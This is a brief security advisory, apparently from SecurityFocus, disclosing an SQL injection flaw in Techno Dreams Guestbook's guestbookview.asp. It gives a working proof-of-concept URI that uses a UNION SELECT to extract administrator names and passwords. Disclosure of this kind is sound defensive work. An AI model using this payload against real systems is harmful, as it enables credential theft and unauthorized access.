Techno Dreams Guestbook Guestbookview.ASP SQL Injection Vulnerability

Attackers can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/guestbookview.asp?key=7782%20union%20select%200,0,adminname,password,0,0,0%20from%20admin


 

Privacy Statement
Copyright 2010, SecurityFocus